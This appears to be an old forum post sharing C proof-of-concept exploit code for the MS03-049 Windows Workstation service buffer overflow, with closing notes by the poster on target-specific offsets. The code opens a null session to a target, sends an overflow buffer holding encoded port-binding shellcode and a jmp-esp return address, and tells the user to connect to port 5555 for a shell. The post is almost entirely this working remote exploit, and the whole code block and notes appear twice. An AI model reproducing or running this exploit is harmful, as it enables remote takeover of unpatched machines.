NI3
11-13-2003, 01:09 PM
Proof of concept for MS03-049.
Modified by Pita
This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
to work *only* with that (it will probably crash the the other 2Ks, no clue
about XPs).
To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
this public version, do not bother to ask.
Credits go to eEye
See original bulletin for more information, it is very well documented.
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "mpr")
#define SIZE 2048
// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x eb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x 25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x 9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x 3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x 4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x 60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x 93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\x db\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x 9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x 02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x 94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x 23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x 89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x 6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x 9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x 32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\x ff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x 27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x 89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\x fd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\x fd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x 47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x 52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x 77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x 2d\x6e\x74\x25";
unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload
int main(int argc, char *argv[])
{
int ret;
HINSTANCE hInstance;
char szBuffer[SIZE];
NETRESOURCE netResource;
char destip[26];
printf("[+] Proof of concept for MS-03-049.\n");
printf("[+] Originaly written by tribalgoa.\n");
printf("[+] Modified by Pita.\n");
if (argc < 3)
{
printf("[-] Usage: %s ip procedure\n",argv[0]);
printf("[-] Ex: %s 192.168.0.1 NetValidateName\n",argv[0]);
printf("[-] Ex: %s 192.168.0.1 NetAddAlternateComputerName\n",argv[0]);
return 0;
}
sprintf(destip,"\\\\%s\\ipc$",argv[1]);
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName = destip;
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
return 1;
}
else
{
printf("[+] WNetAddConnection2 Ok!\n");
}
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;
}
else
{
printf("[+] LoadLibrary Ok!\n");
}
printf("[+] Preparing Buffer");
memset(szBuffer, 0x90, sizeof(szBuffer));
memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
// ebp @ &szBuffer[2013]
*(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)
memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
printf(" Ok!\n");
printf("[+] Sending shellcode");
ret = (GetProcAddress(hInstance, argv[2]))(destip, szBuffer, NULL, NULL, 0);
printf(" Ok!\n");
WNetCancelConnection2(destip, 0, TRUE);
printf("[+] Connect to port 5555 to get the shell\n");
FreeLibrary(hInstance);
return 0;
}
in the original version i had some trouble on execution on
ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0);
so i change it to
ret = (GetProcAddress(hInstance, argv[2]))(destip, szBuffer, NULL, NULL, 0);
---
note:
this exploits uses YOUR MACHINE offsets to attack the remote on. if the remote is not exactly the same os, with the exactly same sp and the exactly same patches, this exploits will NOT work or simply crash the remote machine. it's the same as with the RPC exploits, you first need other offsets.
the offset of "NetValidateName" differs in many versions because of the reason as above mentioned. so the shellcode need to be modified to work everywhere, because for this functions an universal offset doesn't exist
Modified by Pita
This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
to work *only* with that (it will probably crash the the other 2Ks, no clue
about XPs).
To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
this public version, do not bother to ask.
Credits go to eEye
See original bulletin for more information, it is very well documented.
*/
#include <stdio.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "mpr")
#define SIZE 2048
// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x eb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x 25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x 9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x 3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x 4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x 60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x 93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\x db\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x 9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x 02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x 94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x 23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x 89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x 6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x 9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x 32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\x ff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x 27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x 89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\x fd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\x fd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x 47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x 52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x 77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x 2d\x6e\x74\x25";
unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload
int main(int argc, char *argv[])
{
int ret;
HINSTANCE hInstance;
char szBuffer[SIZE];
NETRESOURCE netResource;
char destip[26];
printf("[+] Proof of concept for MS-03-049.\n");
printf("[+] Originaly written by tribalgoa.\n");
printf("[+] Modified by Pita.\n");
if (argc < 3)
{
printf("[-] Usage: %s ip procedure\n",argv[0]);
printf("[-] Ex: %s 192.168.0.1 NetValidateName\n",argv[0]);
printf("[-] Ex: %s 192.168.0.1 NetAddAlternateComputerName\n",argv[0]);
return 0;
}
sprintf(destip,"\\\\%s\\ipc$",argv[1]);
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName = destip;
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
return 1;
}
else
{
printf("[+] WNetAddConnection2 Ok!\n");
}
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;
}
else
{
printf("[+] LoadLibrary Ok!\n");
}
printf("[+] Preparing Buffer");
memset(szBuffer, 0x90, sizeof(szBuffer));
memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
// ebp @ &szBuffer[2013]
*(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)
memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
printf(" Ok!\n");
printf("[+] Sending shellcode");
ret = (GetProcAddress(hInstance, argv[2]))(destip, szBuffer, NULL, NULL, 0);
printf(" Ok!\n");
WNetCancelConnection2(destip, 0, TRUE);
printf("[+] Connect to port 5555 to get the shell\n");
FreeLibrary(hInstance);
return 0;
}
in the original version i had some trouble on execution on
ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0);
so i change it to
ret = (GetProcAddress(hInstance, argv[2]))(destip, szBuffer, NULL, NULL, 0);
---
note:
this exploits uses YOUR MACHINE offsets to attack the remote on. if the remote is not exactly the same os, with the exactly same sp and the exactly same patches, this exploits will NOT work or simply crash the remote machine. it's the same as with the RPC exploits, you first need other offsets.
the offset of "NetValidateName" differs in many versions because of the reason as above mentioned. so the shellcode need to be modified to work everywhere, because for this functions an universal offset doesn't exist